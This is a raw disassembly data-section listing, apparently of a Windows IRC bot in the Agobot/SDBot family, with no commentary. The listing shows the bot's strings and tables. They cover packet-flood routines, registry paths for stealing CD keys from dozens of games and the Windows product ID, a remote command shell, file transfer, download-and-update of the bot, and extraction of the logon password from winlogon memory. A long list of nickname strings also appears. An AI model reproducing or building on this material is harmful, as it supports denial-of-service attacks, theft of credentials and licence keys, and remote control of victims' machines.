; d db 70h, 29h, 2 db 3 aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError(' db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0 unk_4366A8 db 2Dh ; - ; DATA XREF: sub_414746+2F3o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat' db 'a sent (~%dK/s).',0 align 4 unk_43670C db 2Dh ; - ; DATA XREF: sub_414746+CCo db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aSendingPackets db '- Sending packets to %s...',0 unk_436738 db 2Dh ; - ; DATA XREF: sub_414746+80o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0 unk_43677C db 2Dh ; - ; DATA XREF: sub_414746+63o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0 align 4 unk_4367CC db 2Dh ; - ; DATA XREF: sub_414746+2Ao db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aErrorCallingSo db '- Error calling socket().',0 align 4 unk_4367F8 db 2Dh ; - ; DATA XREF: sub_414A92+60o db 3, 34h, 2 db 77h ; w db 6Fh, 6Eh, 6Bh db 2 db 3, 2Dh, 20h aDoneWithFloodP db 'Done with flood, ports hit: %s',0 align 4 aSD db '%s%d ',0 ; DATA XREF: sub_414C2F+204o align 4 dword_43682C dd 202E6425h, 73253403h, 203D2003h, 73253703h, 3 ; DATA XREF: sub_415135+35o dword_436840 dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_415135+10o a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_4151AD+60o align 4 dword_436878 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h ; DATA XREF: sub_41524D:loc_415282o dword_43688C dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h ; DATA XREF: sub_41524D+20o dword_4368A0 dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h ; DATA XREF: sub_41528E+DCo dd 6574656Ch, 0 dword_4368BC dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h ; DATA XREF: sub_41528E+3Fo dd 676E6974h, 0 aDisplay db 'DISPLAY',0 ; DATA XREF: sub_4153BD+11o aWindow db 'Window',0 ; DATA XREF: sub_4155F8+23o ; sub_4157F1+26o align 4 dd 80000001h off_4368EC dd offset aSoftwareValveC ; DATA XREF: sub_415A30+Cr ; sub_415A30+21o ; "Software\\Valve\\CounterStrike\\Settings" dd offset aCdkey ; "CDKey" dd offset aCounterStrikeR ; "Counter-Strike (Retail)" dword_4368F8 dd 2 dup(0) ; DATA XREF: sub_415A30+26o dd 80000001h, 437A7Ch, 437A70h, 437A60h, 2 dup(0) dd 80000001h, 437A40h, 437A3Ch, 437A28h, 2 dup(0) dd 80000001h, 437A04h, 437A3Ch, 4379F8h, 2 dup(0) dd 80000001h, 4379D4h, 4379CCh, 4379B8h, 2 dup(0) dd 80000001h, 4379A4h, 437994h, 437978h, 2 dup(0) dd 80000001h, 437934h, 437ABCh, 437920h, 2 dup(0) dd 80000002h, 4378F4h, 4378E8h, 4378C8h, 2 dup(0) dd 80000002h, 437894h, 437ABCh, 43787Ch, 2 dup(0) dd 80000002h, 437848h, 437ABCh, 437830h, 2 dup(0) dd 80000002h, 437818h, 437ABCh, 437800h, 2 dup(0) dd 80000002h, 4377C4h, 43D808h, 4377B4h, 2 dup(0) dd 80000002h, 43777Ch, 43D808h, 437768h, 2 dup(0) dd 80000002h, 43771Ch, 43D808h, 4376FCh, 2 dup(0) dd 80000002h, 4376ACh, 43D808h, 437680h, 2 dup(0) dd 80000002h, 437644h, 43D808h, 437630h, 2 dup(0) dd 80000002h, 4375F8h, 43D808h, 4375E8h, 2 dup(0) dd 80000002h, 437598h, 43D808h, 43756Ch, 2 dup(0) dd 80000002h, 43752Ch, 43D808h, 437510h, 2 dup(0) dd 80000002h, 4374E0h, 43D808h, 4374C0h, 2 dup(0) dd 80000002h, 437484h, 43D808h, 437470h, 2 dup(0) dd 80000002h, 437428h, 43D808h, 437408h, 2 dup(0) dd 80000002h, 4373B4h, 43D808h, 437384h, 2 dup(0) dd 80000002h, 437334h, 43D808h, 437308h, 2 dup(0) dd 80000002h, 4372C8h, 4372C0h, 4372A0h, 2 dup(0) dd 80000002h, 43725Ch, 43D808h, 437240h, 2 dup(0) dd 80000002h, 4371F4h, 43D808h, 4371D0h, 2 dup(0) dd 80000002h, 43719Ch, 43D808h, 437190h, 2 dup(0) dd 80000002h, 43715Ch, 43D808h, 437150h, 2 dup(0) dd 80000002h, 43711Ch, 43D808h, 437110h, 2 dup(0) dd 80000002h, 4370DCh, 43D808h, 4370D0h, 2 dup(0) dd 80000002h, 437094h, 43D808h, 437080h, 2 dup(0) dd 80000002h, 437044h, 43D808h, 437030h, 2 dup(0) dd 80000002h, 437000h, 437ABCh, 436FE4h, 2 dup(0) dd 80000002h, 436FC4h, 436FBCh, 436F98h, 2 dup(0) dd 80000002h, 436F7Ch, 436FBCh, 436F5Ch, 2 dup(0) dd 80000002h, 436F3Ch, 436FBCh, 436F18h, 2 dup(0) dd 80000002h, 436F00h, 436FBCh, 436EFCh, 2 dup(0) dd 80000002h, 436EE0h, 436ED0h, 436EC8h, 2 dup(0) dd 80000002h, 436E94h, 42C914h, 436E7Ch, 2 dup(0) dd 80000002h, 436E40h, 436E34h, 436E0Ch, 436DFCh, 436DE8h dd 80000002h, 436DC4h, 436DB8h, 436DA4h, 436D94h, 436D8Ch dd 80000002h, 436DC4h, 436DB8h, 436D60h, 436D94h, 436D58h dd 80000002h, 436DC4h, 436DB8h, 436D28h, 436D94h, 436D20h dd 6 dup(0) dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h dd 64726564h, 296B7261h, 0 dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h dd 696E692Eh, 0 aNeverwinterNig db 'Neverwinter Nights',0 align 4 aLocation db 'Location',0 align 4 aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0 align 4 aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0 align 4 aBaseMpSof2key db 'base\mp\sof2key',0 aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0 align 4 aInstallpath db 'InstallPath',0 db 53h aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0 align 4 aHiddenDangerou db 'Hidden & Dangerous 2',0 align 4 db 53h aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0 align 4 aChrome db 'Chrome',0 align 10h aSerialnumber db 'SerialNumber',0 align 10h db 53h aOftwareTechlan db 'oftware\Techland\Chrome',0 align 4 aNox db 'NOX',0 aSoftwareWestwo db 'Software\Westwood\NOX',0 align 4 aCommandAndConq db 'Command and Conquer: Red Alert 2',0 align 4 db 53h aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0 align 4 aCommandAndCo_0 db 'Command and Conquer: Red Alert',0 align 4 db 53h aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0 aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0 align 4 aSerial db 'Serial',0 align 4 db 53h aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0 align 4 aRainbowSixIiiR db 'Rainbow Six III RavenShield',0 db 53h aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0 align 10h aNascarRacing20 db 'Nascar Racing 2003',0 align 4 db 53h aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0 align 10h aNascarRacing_0 db 'Nascar Racing 2002',0 align 4 db 53h aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0 align 10h aNhl2003 db 'NHL 2003',0 align 4 db 53h aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0 align 10h aNhl2002 db 'NHL 2002',0 align 4 db 53h aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0 align 10h aFifa2003 db 'FIFA 2003',0 align 4 db 53h aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0 align 10h aFifa2002 db 'FIFA 2002',0 align 4 db 53h aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0 align 10h aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0 align 4 db 53h aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi' db 'on\ergc',0 align 10h aNeedForSpeedUn db 'Need For Speed: Underground',0 db 53h aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0 align 10h aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0 align 10h aErgc db 'ergc',0 align 4 db 53h aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0 align 4 aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0 align 4 db 53h aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp' db 'earhead\ergc',0 align 4 aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0 align 4 db 53h aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br' db 'eakthrough\ergc',0 align 4 aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0 align 4 db 53h aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er' db 'gc',0 align 10h aGlobalOperatio db 'Global Operations',0 align 4 db 53h aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0 align 10h aCommandAndCo_2 db 'Command and Conquer: Generals',0 align 10h db 53h aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0 aJamesBond007Ni db 'James Bond 007: Nightfire',0 align 4 db 53h aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0 aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0 align 4 db 53h aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer' db 'o Hour\ergc',0 align 4 aBlackAndWhite db 'Black and White',0 db 53h aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0 align 10h aBattlefieldVie db 'Battlefield Vietnam',0 db 53h aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0 align 10h aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0 align 4 db 53h aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons ' db 'of WWII\ergc',0 align 4 aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0 db 53h aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom' db 'e\ergc',0 align 4 aBattlefield1_1 db 'Battlefield 1942',0 align 4 db 53h aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0 aFreedomForce db 'Freedom Force',0 align 4 db 53h aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0 aIgi2CovertStri db 'IGI 2: Covert Strike',0 align 4 db 53h aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0 align 10h aUnrealTourname db 'Unreal Tournament 2004',0 align 4 db 53h aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0 align 4 aUnrealTourna_0 db 'Unreal Tournament 2003',0 align 4 db 53h aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0 align 4 aMicrosoftWindo db 'Microsoft Windows Product ID',0 align 4 aProductid db 'ProductId',0 align 4 db 53h aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion',0 align 10h aSoldiersOfAnar db 'Soldiers Of Anarchy',0 aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0 align 4 aLegendsOfMight db 'Legends of Might and Magic',0 align 4 aCustomernumber db 'CustomerNumber',0 align 4 aSoftware3d0Sta db 'Software\3d0\Status',0 aIndustryGiant2 db 'Industry Giant 2',0 align 4 aPrvkey db 'prvkey',0 align 4 aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0 align 4 aHalfLife db 'Half-Life',0 align 4 aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0 align 4 aGunmanChronicl db 'Gunman Chronicles',0 align 4 aKey_0 db 'Key',0 aSoftwareValveG db 'Software\Valve\Gunman\Settings',0 align 10h aTheGladiators db 'The Gladiators',0 align 10h aRegnumber db 'RegNumber',0 align 4 aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0 align 4 aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: UPX0:004368F4o aCdkey db 'CDKey',0 ; DATA XREF: UPX0:004368F0o align 4 aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: UPX0:off_4368ECo align 4 asc_437AEC: ; DATA XREF: sub_415A30+E9o ; sub_415A30+F4o unicode 0, <=>,0 dword_437AF0 dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah ; DATA XREF: sub_415A30+2Bo dd 0 unk_437B08 db 2Dh ; - ; DATA XREF: sub_415C5A+170o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToSendTo db '- failed to send to Remote command shell',0 align 4 unk_437B3C db 2Dh ; - ; DATA XREF: sub_415C5A+ABo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToOpenRe db '- failed to open remote command shell',0 align 4 unk_437B6C db 2Dh ; - ; DATA XREF: sub_415C5A+47o ; sub_415E1B+FDo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToOpenSo db '- failed to open socket',0 align 10h dword_437B90 dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h ; DATA XREF: sub_415E1B+362o ; sub_4161BD+156o dd 726F72h unk_437BA8 db 2Dh ; - ; DATA XREF: sub_415E1B+2FAo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0 align 4 unk_437BD4 db 2Dh ; - ; DATA XREF: sub_415E1B+202o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aUnableToOpenSo db '- unable to open socket',0 align 4 dword_437BF8 dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h ; DATA XREF: sub_415E1B+1CBo dd 74756Fh dword_437C10 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h ; DATA XREF: sub_415E1B+16Ao dd 169h unk_437C28 db 2Dh ; - ; DATA XREF: sub_415E1B+127o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFileDoesnTExis db '- file doesn',27h,'t exist',0 align 4 unk_437C48 db 2Dh ; - ; DATA XREF: sub_415E1B+82o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToBindTo db '- failed to bind to socket',0 unk_437C6C db 2Dh ; - ; DATA XREF: sub_415E1B+44o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToCrea_2 db '- failed to create socket',0 align 10h unk_437C90 db 2Dh ; - ; DATA XREF: sub_4161BD+1D1o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aReceivedSFromS db '- received %s from %s (%s bytes).',0 align 4 unk_437CBC db 2Dh ; - ; DATA XREF: sub_4161BD+CBo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aErrorOpeningSo db '- error opening socket',0 unk_437CDC db 2Dh ; - ; DATA XREF: sub_4161BD+ABo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aErrorOpeningFi db '- error opening file for writing',0 align 4 aAB db 'a+b',0 ; DATA XREF: sub_4161BD+97o unk_437D0C db 2Dh ; - ; DATA XREF: sub_4161BD+83o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aErrorUnableToW db '- error unable to write file to disk',0 align 4 unk_437D3C db 2Dh ; - ; DATA XREF: sub_4163FA+493o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aBadUrlOrDnsErr db 'bad url or dns error at %s.',0 unk_437D68 db 2Dh ; - ; DATA XREF: sub_4163FA+485o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aUpdateFailedEr db 'update failed, error executing %s',0 align 4 unk_437D9C db 2Dh ; - ; DATA XREF: sub_4163FA+3C9o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0 align 10h dword_437DE0 dd 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh ; DATA XREF: sub_4163FA+358o dd 25206465h, 73h unk_437DFC db 2Dh ; - ; DATA XREF: sub_4163FA+2E1o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0 align 4 unk_437E34 db 2Dh ; - ; DATA XREF: sub_4163FA+262o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aWrongCrcDD_ db 'wrong crc (%d != %d).',0 align 4 unk_437E5C db 2Dh ; - ; DATA XREF: sub_4163FA+1D8o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aWrongFilesizeD db 'wrong filesize (%d != %d).',0 align 4 unk_437E88 db 2Dh ; - ; DATA XREF: sub_4163FA+195o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aGotUpdateSDkb_ db 'got update %s (%dKB).',0 align 10h unk_437EB0 db 2Dh ; - ; DATA XREF: sub_4163FA+183o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aDownloadedSDkb db 'downloaded %s (%dKB)',0 align 4 unk_437ED8 db 2Dh ; - ; DATA XREF: sub_4163FA+77o db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0 align 10h aUnknown db 'Unknown',0 ; DATA XREF: sub_4169A2:loc_4169E5o ; sub_418EF7+10Ao aInvalid db 'Invalid',0 ; DATA XREF: sub_4169A2:loc_4169DFo aDisk db 'Disk',0 ; DATA XREF: sub_4169A2:loc_4169D9o align 4 aNetwork db 'Network',0 ; DATA XREF: sub_4169A2:loc_4169D3o aCdrom db 'Cdrom',0 ; DATA XREF: sub_4169A2:loc_4169CDo align 4 off_437F28 dd offset word_4D4152 ; DATA XREF: sub_4169A2:loc_4169C7o word_437F2C dw 3Fh ; DATA XREF: sub_4169A2+1Fo ; sub_41AA43:loc_41AB45r align 10h aFailed db 'failed',0 ; DATA XREF: sub_416A33:loc_416B11o ; sub_416B57+3Bo align 4 aSkb db '%sKB',0 ; DATA XREF: sub_416A33+6Co align 10h unk_437F40 db 2Dh ; - ; DATA XREF: sub_416B57+8Eo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0 align 4 unk_437F7C db 2Dh ; - ; DATA XREF: sub_416B57+58o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0 aA_1 db 'A:\',0 ; DATA XREF: sub_416C29:loc_416C6Eo dword_437FBC dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h ; DATA XREF: sub_416CAE+C8o dd 64252064h, 6C696620h, 7365h unk_437FDC db 2Dh ; - ; DATA XREF: sub_416CAE+5Co db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 66h ; f db 69h, 6Ch, 65h db 2 db 3, 2Dh, 20h aSearchingFor_0 db 'searching for file %s',0 align 4 dword_438004 dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h ; DATA XREF: sub_416DC9+107o dd 73252064h, 73255Ch dword_438020 dd 2A5C7325h, 0 ; DATA XREF: sub_416DC9+1Ao unk_438028 db 2Dh ; - ; DATA XREF: sub_416F1B:loc_417094o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h aFailedToEnable db 'failed to enable debug privilege',0 align 4 unk_43805C db 2Dh ; - ; DATA XREF: sub_416F1B:loc_417067o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h aUnableToFindWi db 'unable to find winlogon pid',0 unk_438088 db 2Dh ; - ; DATA XREF: sub_416F1B:loc_417060o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h aUnableToFindTh db 'unable to find the password in memory',0 align 10h unk_4380C0 db 2Dh ; - ; DATA XREF: sub_416F1B+117o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h db 57h ; W db 69h, 6Eh, 4Ch db 6Fh ; o db 67h, 6Fh, 6Eh db 20h db 49h, 6Eh, 66h db 6Fh ; o db 72h, 6Dh, 61h db 74h ; t db 69h, 6Fh, 6Eh db 20h db 28h, 50h, 49h db 44h ; D db 20h, 25h, 64h db 29h ; ) db 20h, 2Dh, 20h db 2 db 44h, 6Fh, 6Dh db 61h ; a db 69h, 6Eh, 2 db 3Ah ; : db 20h, 2 dup(5Ch) db 25h ; % db 53h, 2Ch, 20h db 2 db 55h, 73h, 65h db 72h ; r db 2, 3Ah, 20h aSNoPassword_ db '(%S/(no password)).',0 aUserdomain: ; DATA XREF: sub_416F1B+DCo unicode 0, <USERDOMAIN>,0 align 4 aUsername: ; DATA XREF: sub_416F1B+CEo unicode 0, <USERNAME>,0 align 4 aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_416F1B+9Ao align 4 aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_416F1B+8Do align 10h aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_416F1B+80o aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_416F1B+73o align 4 aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_416F1B+68o align 4 aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_416F1B+55o align 4 aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_416F1B+40o ; sub_416F1B+161o ... align 4 unk_4381F8 db 2Dh ; - ; DATA XREF: sub_416F1B+35o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h aOnlySupportedO db 'only supported on winnt/win2k',0 align 4 aMsgina db 'MSGINA',0 ; DATA XREF: sub_4170ED+13Eo align 10h aNwgina db 'NWGINA',0 ; DATA XREF: sub_4170ED+123o align 4 aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_4170ED+AFo align 4 dword_438244 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h ; DATA XREF: sub_417553+70o ; sub_4175EA+C7o dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 295325h dword_438294 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h ; DATA XREF: sub_4175EA+E1o dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 412F4E28h dd 2929h off_4382E8 dd offset aQ ; DATA XREF: sub_417ADE+5Cr ; "q" dd offset dword_438E90 dd offset aE ; "e" dd offset aR ; "r" dd offset aT ; "t" dd offset dword_438E8C dd offset aU ; "u" dd offset aI ; "i" dd offset aP ; "p" dd offset aA ; "a" dd offset aS_1 ; "s" dd offset aD ; "d" dd offset dword_438E88 dd offset dword_438E84 dd offset dword_438E80 dd offset aJ ; "j" dd offset aK ; "k" dd offset asc_42CE54 ; "l" dd offset dword_438E7C dd offset dword_438E78 dd offset aC ; "c" dd offset aV ; "v" dd offset dword_438E74 dd offset aN ; "n" dd offset aM ; "m" dd offset dword_438E70 dd offset dword_438E6C dd offset dword_438E68 dd offset dword_438E64 dd offset dword_438E60 dd offset word_438E5C dd offset dword_438E58 dd offset aI_0 ; "I" dd offset dword_438E54 dd offset dword_438E50 dd offset aA_0 ; "A" dd offset dword_438E4C dd offset dword_438E48 dd offset dword_438E44 dd offset dword_438E40 dd offset dword_438E3C dd offset dword_438E38 dd offset dword_438E34 dd offset dword_438E30 dd offset dword_438E2C dd offset dword_438E28 dd offset dword_438E24 dd offset dword_438E20 dd offset dword_438E1C dd offset word_438E18 dd offset aM_0 ; "M" dd offset aSmartmir ; "SMARTMIR" dd offset aFarooq ; "farooq" dd offset aMaxxguy ; "maxxguy" dd offset aBobmarley ; "BOBMARLEY" dd offset aEmilya ; "emilya" dd offset aKrizha ; "KRIZHA" dd offset aCar1nna ; "Car1nna" dd offset aSwin ; "swin" dd offset aMale ; "male" dd offset aKoko ; "koko" dd offset aFlexster ; "flexster" dd offset aKen ; "ken" dd offset aShez ; "Shez" dd offset aTalika ; "talika" dd offset aMarcy ; "marcy" dd offset aCme ; "cme" dd offset aHeval ; "heval" dd offset aBunty ; "bunty" dd offset aJanno ; "janno" dd offset aRimpy ; "rimpy" dd offset aNastysha ; "nastysha" dd offset aLuisa ; "Luisa" dd offset aTroller ; "troller" dd offset aManee ; "manee" dd offset aKermit ; "kermit" dd offset aPuregold ; "puregold" dd offset aCoredump ; "CoreDump" dd offset aImra ; "imra" dd offset aGirl ; "GirL" dd offset aCamel ; "CAMEL" dd offset aReshma ; "reshma" dd offset aKencing ; "Kencing" dd offset aThr45h3r5 ; "THR45H3R5" dd offset aCansuuuu ; "cansuuuu" dd offset aKaan38dent ; "kaan38dent" dd offset aErkan27 ; "erkan27" dd offset aHexaaa ; "hexaaa" dd offset aBerk19 ; "berk19" dd offset aObenibisevse ; "OBeNiBiSeVSe" dd offset aIrmal ; "irmal" dd offset aMisssunday ; "misssunday" dd offset aTolga34 ; "Tolga34" dd offset aJericho ; "JERICHO" dd offset aMary_0 ; "MARY" dd offset aAkin ; "AKIN" dd offset aMelekk ; "melekk" dd offset aTrend3 ; "trend3" dd offset aMERVE ; "M-E-R-V-E" dd offset aTekir ; "tekir" dd offset aVenedik34 ; "venedik34" dd offset aSevmekmi ; "sevmekmi" dd offset aSudenur ; "SUDENUR" dd offset aArzu ; "ARZU" dd offset aHaticem ; "haticem" dd offset aErnesto ; "ERNESTO" dd offset aAslii ; "aslii" dd offset aPiramit ; "PIRAMIT" dd offset aSamyeli21 ; "samyeli21" dd offset aRetg ; "RETG" dd offset aBlackpearl ; "blackpearl" dd offset aPelincik ; "pelincik" dd offset aAhmet ; "ahmet" dd offset aTurkyy ; "turkyy" dd offset aAnk32m ; "ank32m" dd offset aZack ; "ZACK" dd offset aIzmir39m ; "Izmir39m" dd offset aAlbina ; "albina" dd offset dword_438BB0 dd offset off_438BAC dd offset aAnkh ; "ankh" dd offset aDonjuanm ; "Donjuanm" dd offset aBogac ; "bogac" dd offset aAlpay34m ; "alpay34m" dd offset aCongueror ; "CoNGuERoR" dd offset aDenizlim ; "DenizliM" dd offset aBerk19m ; "Berk19m" dd offset aDevran ; "devran" dd offset aArda ; "arda" dd offset aKeyiflisert ; "keyifliSERT" dd offset aMurat34M ; "murat34-m" dd offset aHakan3 